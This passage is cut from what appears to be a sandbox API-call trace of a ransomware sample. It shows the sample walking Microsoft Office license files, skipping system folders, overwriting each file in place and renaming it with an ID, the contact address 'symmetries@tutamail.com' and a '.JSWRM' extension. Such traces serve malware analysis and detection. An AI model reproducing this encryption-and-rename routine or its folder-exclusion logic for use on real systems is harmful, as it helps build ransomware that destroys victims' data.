Flags=0x0, Size=0x20) returned 0x241290 [0112.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241290, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0112.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0112.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0112.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0112.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.041] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0112.042] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0112.042] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0112.044] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.044] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0112.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.044] CloseHandle (hObject=0x45c) returned 1 [0112.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0112.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0112.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0112.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0112.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0112.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0112.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0112.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.051] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec940998, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec940998, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec9ff550, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdR_Retail-ul-phn.xrm-ms", cAlternateFileName="VIE0AC~1.XRM")) returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0112.051] lstrcmpiW (lpString1="VisioStdR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0112.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0112.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0112.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0112.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0112.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0112.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0112.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0112.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.052] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19931) returned 1 [0112.052] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0112.052] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0112.056] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.056] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0112.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.056] CloseHandle (hObject=0x45c) returned 1 [0112.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0112.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0112.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0112.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0112.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.057] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0112.058] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecd20718, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecd20718, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecddf29a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="VIB427~1.XRM")) returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.058] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0112.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0112.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0112.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0112.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0112.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.059] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6796) returned 1 [0112.059] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0112.059] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0112.063] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.063] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0112.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.063] CloseHandle (hObject=0x45c) returned 1 [0112.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0112.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0112.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0112.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0112.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0112.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0112.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.063] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0112.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0112.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.064] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeccfa4bf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeccfa4bf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecdb905b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="VI9BD4~1.XRM")) returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.064] lstrcmpiW (lpString1="VisioStdVL_KMS_Client-ul-oob.xrm-ms", 